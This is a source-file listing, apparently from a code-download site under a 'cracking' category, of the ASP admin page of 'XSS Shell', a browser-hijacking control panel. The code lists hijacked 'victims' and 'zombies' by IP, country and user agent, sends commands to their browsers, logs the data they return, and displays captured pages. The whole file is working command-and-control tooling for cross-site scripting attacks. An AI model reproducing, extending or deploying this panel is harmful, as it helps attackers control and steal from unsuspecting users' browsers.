default.asp
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:5k
源码类别:

破解

开发平台:

ASP/ASPX

  1. <%
  2. '09/08/2006
  3. ' - Started
  4. '
  5. ' 15/08/2006
  6. ' - Working alpha
  7. '
  8. '18/08/2006
  9. ' New UI
  10. '
  11. '31/10/2006
  12. ' Now supports activity and shows active zombies and drops non-active ones
  13. ' Multiple victim support with send and save
  14. ' Faster victim notification
  15. ' TODO;
  16. ' - Log commands locally for analyze later
  17. ' + Build up connection interface 
  18. ' - Command Shell
  19. ' / Command Interface
  20. ' + Implement AJAX for interface (low pr)
  21. %>
  22. <!--#include file="db.asp" -->
  23. <%
  24. protected()
  25. Dim CallType
  26. CallType = fm_Qnstr("c")
  27. 'Call only logs
  28. Select Case CallType 
  29. Case 1
  30. Call Logs()
  31. Case 2
  32. Call Victims()
  33. End Select
  34. '// Poor man's AJAX Calls
  35. If CallType > 0 Then Response.End
  36. Title = "XSS Shell Admin"
  37. %>
  38. <!--#include file="header.asp" -->
  39. <%
  40. Call ShowCommands()
  41. %>
  42. <div id="victims">
  43. <div id="victimsUpdater">
  44. <%Victims()%>
  45. </div>
  46. </div>
  47. <div id="logHolder">
  48. <h2>Logs</h2>
  49. <div id="log"></div>
  50. </div>
  51. <%
  52. Call Viewer()
  53. '---------------------------------------------------------------------------
  54. ' Helpers
  55. '---------------------------------------------------------------------------
  56. Sub Victims()
  57. Dim RsVic
  58. getRs RsVic, "SELECT TOP " & MAX_VICTIM & " Victim.IP, Victim.ID, Victim.VictimID, RequestTime, RawUserAgent, Data FROM Victim, VictimDetail WHERE VictimDetail.VictimID = Victim.VictimID AND lastseen >  DATEADD(""s"",-" & Activity & ",Now) ORDER BY Victim.ID DESC"
  59. Response.Write "<h2>Victims</h2>" 
  60. Dim viclist, Starter
  61. While Not RsVic.EOF 
  62. PrintVictim(RsVic)
  63. If Starter Then viclist = viclist & ","
  64. viclist = viclist & RsVic("VictimID")
  65. Starter = True
  66. RsVic.MoveNext
  67. Wend
  68. Response.Write "[" & viclist
  69. fmKill RsVic
  70. End Sub
  71. Sub PrintVictim(ByVal Rs)
  72. Dim Data, ProxyData
  73. ProxyData = Rs("Data")
  74. If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
  75. Data = Data & "<strong>Victim ID : </strong>" & Rs("VictimID") & "<br>"
  76. Data = Data & "<div class=code>" & fm_Encode(Rs("RawUserAgent")) & "</div>"
  77. If ProxyData <> "" Then Data = Data & "<div class=code>" & ProxyData & "</div>"
  78. Dim Checked 
  79. Checked = false
  80. With Response
  81. .Write "<div class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)"" help=""" & Data & """ >"
  82. .Write "<img src=""mg/flags/" & GetCountry(Rs("IP")) & ".png"" alt=""" & GetCountry(Rs("IP")) & """ width=""20"" height=""13"" > "
  83. .Write Rs("IP") & " / " & Rs("VictimID") & "</div>"
  84. End With
  85. 'Response.Write "<ul><a href=""showdata.asp?i=" & Rs("ID") & "&m=1"">" & Rs("IP") & "</a> - <em>" & Rs("RequestTime") & "</em></ul>"
  86. End Sub
  87. ' COMMANDS BOX
  88. '---------------------------------------------------------------------------
  89. ' Show Available Commands
  90. Sub ShowCommands()
  91. %>
  92. <div id="commands">
  93. <h2>Commands</h2>
  94. <%
  95. Dim i
  96. For i = 0 To UBound(Commands) Step 3
  97. Response.Write "<div id=""cmd" & i & """ class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)""><a href=""javascript:;"" onclick=""sendCommand('" & Commands(i+1) & "');new Effect.Highlight(document.getElementById('cmd" & i & "'), '#ff0000')"">" & fm_Encode(Commands(i)) & "</a><br>" & Commands(i+2) & "</div>"
  98. Next 
  99. %>
  100. <hr /><strong>Parameters :</strong> <br />
  101. <textarea name="params" id="params" style="width:98%;height:80px"></textarea>
  102. <input type="hidden" id="victims" value="" />
  103. <hr />
  104. </div>
  105. <%
  106. End Sub
  107. ' VIEWER BOX
  108. '---------------------------------------------------------------------------
  109. ' Offline Content Viewer iframe 
  110. Sub Viewer()
  111. %>
  112. <div id="offlinebrowser">
  113. <h2>Viewer</h2>
  114. <iframe name="offlinebrw" id="offlinebrw" src="javascript:document.write('.');document.close()"></iframe>
  115. </div>
  116. <%
  117. End Sub
  118. ' LOGS BOX
  119. '---------------------------------------------------------------------------
  120. ' Show recent logs from victims
  121. Sub Logs()
  122. Dim RsLog
  123. getRs RsLog, "SELECT TOP " & DEFAULT_REC & " ID, Data, Type, AttackID, Shown FROM Log ORDER BY ID DESC"
  124. ' Response.Write "<h2>Logs : " & Minute(Now) & ":" & Second(Now) & "</h2>"
  125. Response.Write "<ol>"
  126. While Not RsLog.EOF 
  127. PrintLog(RsLog)
  128. RsLog.MoveNext
  129. Wend
  130. Response.Write "</ol>"
  131. fmKill RsLog
  132. End Sub
  133. ' Print and Format Logs
  134. Function PrintLog(ByVal Rs)
  135. Dim Value 
  136. If Rs("Data") <> "" Then
  137. Value = fm_Encode(Rs("Data"))
  138. Value = Replace(Value, "%7Bn%7D", "<br />")
  139. Value = Replace(Value, "%3Atrue", "%3A<strong>true</strong>")
  140. Else
  141. Value = Rs("AttackID") & "..."
  142. End If
  143. Dim CSSname
  144. '// Pushed
  145. If Rs("Shown") = 1 Then
  146. CSSname = "pushed"
  147. End If
  148. If Rs("Data") <> "" Then
  149. CSSname = "done"
  150. End If
  151. Value = "<span class=""" & CSSName & """>" & Value & "</span>"
  152. If Rs("Type") = HTMLPAGE Then
  153. Value = "<a href=""showdata.asp?i=" & Rs("ID") & """ target=""offlinebrw"">HTML - (be careful for backfire!)</a>"
  154. End If
  155. Response.Write "<li>" & Value & "</li>"
  156. End Function
  157. %>
  158. <!--#include file="footer.asp" -->